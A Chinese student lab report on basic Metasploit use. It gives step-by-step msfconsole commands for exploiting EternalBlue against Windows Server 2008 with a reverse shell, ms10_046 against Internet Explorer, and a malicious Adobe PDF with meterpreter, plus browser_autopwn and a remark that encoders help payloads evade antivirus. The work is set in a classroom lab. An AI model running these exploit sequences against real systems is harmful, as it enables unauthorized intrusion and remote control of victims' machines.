2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
实践原理
1.MSF攻击方法
- 主动攻击:扫描主机漏洞,进行攻击
- 攻击浏览器
- 攻击其他客户端
2.MSF的六个模块
查看六种模块源码目录
/usr/share/metasploit-framework/modules
渗透攻击模块
Exploit Modules
:攻击漏洞,把shellcode"背"过去辅助模块
Auxiliary Modules
:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提攻击载荷
Payload Modules
:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码空字段模块
Nop Modules
编码模块
Encoders
后渗透攻击模块
Post
:攻击成功之后,动态传输代码使其在被控机执行
3.MSF的三种用户操作界面
msfconsole
- 查看模块的具体信息
info[exploits|auxiliary|post|payloads|encoders|nops]
- 查看设置信息
show [options]
- 查看攻击目标类型
show [target]
- 查找命令
search
- 查找2018年产生的在windows平台下的漏洞
search ms18(或CNE:2018) type:exploit platform:windows armitage
- 启动服务器
service postgresql start
- 启动
armitagearmitage
webgui
4.MSF常用漏洞利用命令
search name
:用指定关键字搜索可以利用的漏洞模块use exploit name
:使用漏洞show options
:显示配置选项set option name option
:设置选项show payloads
:回链攻击载荷show targets
: 显示目标(os版本)set TARGET target number
:设置目标版本exploit
:开始漏洞攻击sessions -l
:列出会话sessions -i id
:选择会话sessions -k id
:结束会话Ctrl+z
:把会话放到后台Ctrl+c
:结束会话show auxiliary
:显示辅助模块use auxiliary name
:使用辅助模块set option name option
:设置选项exploit
:运行模块
2.实践内容概述
一个主动攻击实践,如ms08_067; (1分)
一个针对浏览器的攻击,如ms11_050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
3.基础问题回答
- 用自己的话解释什么是
exploit
,payload
,encode
exploit
是载具,连接漏洞,将payload
传送到靶机中。payload
是载荷,是exploit
中shellcode
中的主要功能代码,exploit
把它送到靶机中后,是真正负责进行攻击代码。encode
是编码,用来改变payload
,避免payload
中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload
是攻击代码。
实验步骤
实验一:使用ms17_010_eternalblue
进行主动攻击
靶机:Windows Server 2008
,ip地址192.168.216.137
payload:generic/shell_reverse_tcp
- 进入
msfconsole
use exploit/windows/smb/ms17_010_eternalblue.rb
//使用该模块show payloads
//查看载荷set payload generic/shell_reverse_tcp
//使用tcp反弹连接set LHOST 192.168.216.130
//设置攻击机的IP,即KALI的IP地址set LPORT 5301
//设置攻击端口set RHOST 192.168.216.137
//设置靶机IPset target 0
//选择自动目标系统类型
exploit
进行攻击攻击成功
攻击浏览器的实践
ms10_046
靶机:
Windows 7 + IE8
exploit :
exploit/windows/smb/ms10_046_shortcut_icon_dllloader
payload :
windows/meterpreter/reverse_https
实验步骤
search ms10-046
//看看其他的exploituse exploit/windows/smb/ms10_046_shortcut_icon_dllloader
//使用漏洞show payloads
//显示可用攻击载荷set windows/meterpreter/reverse_https
//选择攻击载荷show options
//查看配置信息set LHOST 192.168.126.130
//设置监听地址set SRVHOST 192.168.126.130
//设置本地收听地址set LPORT
//设置端口号exploit
#开始攻击
- 将生成的URL地址在winXP的IE中打开
- 但是我在ie中打开失败了,更新ie8.0也没有解决
同学说虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功
攻击客户端的实践
- Adobe
- 靶机:Windows XP
payload : windows/meterpreter/bind_tcp
实验步骤
msfconsole
//进入控制台
-search adobe
//进行查找use windows/fileformat/adobe_cooltype_sing
//使用漏洞info
//查看漏洞具体信息(重点当然是description)set payload windows/meterpreter/bind_tcp
//选择攻击载荷show options
//查看详细信息set LPORT 5301
//设置端口号set RHOST 192.168.1.148
//设置靶机IP地址exploit
#攻击
- 将生成的
msf.pdf
复制到Windows XP中
攻击成功
browser_autopwn 辅助模块(成功且唯一)
- 通过
search auxiliary
查找辅助模块,找到适合的进行运行
过程 use auxiliary/server/browser_autopwn
- info
set SRVHOST 192.168.216.130
set SRVPORT 5301
- `
set LHOST 192.168.216.130
run
描述
描述:这个模块有三个动作。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,然后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印所有利用Web服务器操作将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同攻击成功
实验总结与体会
本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。这也是实验的乐趣所在。
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
随机推荐
- poj 2406 Power Strings(kmp应用)
题目链接:http://poj.org/problem?id=2406 题意:给出一个字符串s,求重复子串出现的最大次数. 分析:kmp的next[]数组的应用. 要求重复子串出现的最大次数,其实就是 ...
- Enum 枚举值 (一) 获取描述信息
封装了方法: public static class EnumOperate { public class BaseDescriptionAttribute : DescriptionAttribut ...
- Play with Floor and Ceil UVA - 10673(拓展欧几里得)
因为我现在还不会用这个...emm...蒟蒻...只看了 从来没用过....所以切一道水题...练一下... 人家讲的很好 https://blog.csdn.net/u012860428/arti ...
- 【BZOJ1970】[AHOI2005]矿藏编码(模拟)
[BZOJ1970][AHOI2005]矿藏编码(模拟) 题面 BZOJ 洛谷 题解 随便写个高精度模拟一下就完了. #include<iostream> #include<cstd ...
- 背包问题的优化(洛谷1776 宝物筛选_NOI导刊)
背包型dp,但是没有看清数据范围差点认为是水题了,(然后诡异的拿了20分)标解是:2进制优化,比较简单把每一类物品看做若干个相互独立的物品,放在一个另外的数组里,然后全局跑一边01就可以.主要思想是: ...
- 【枚举Day1】20170529-2枚举算法专题练习 题目
20170529-2枚举算法专题练习 题解: http://www.cnblogs.com/ljc20020730/p/6918360.html 青岛二中日期 序号 题目名称 输入文件名 输出文件名 ...
- 洛谷 P2146 [NOI2015]软件包管理器 解题报告
P2146 [NOI2015]软件包管理器 题目描述 Linux用户和OSX用户一定对软件包管理器不会陌生.通过软件包管理器,你可以通过一行命令安装某一个软件包,然后软件包管理器会帮助你从软件源下载软 ...
- php编程——验证码的实现(session方法)
index.PHP(实现输入验证码页面)代码如下: <html><head><title>check code</title></head> ...
- (转)flask的context机制
本文转自:https://blog.tonyseek.com/post/the-context-mechanism-of-flask/ 作者:无知的 TonySeek 注意:本文仅仅作为个人mark, ...
- 论攻击Web应用的常见技术
攻击目标: 应用HTTP协议的服务器和客户端.以及运行在服务器上的Web应用等. 攻击基础: HTTP是一种通用的单纯协议机制.在Web应用中,从浏览器那接受到的HTTP请求的全部内容,都可以在客户端 ...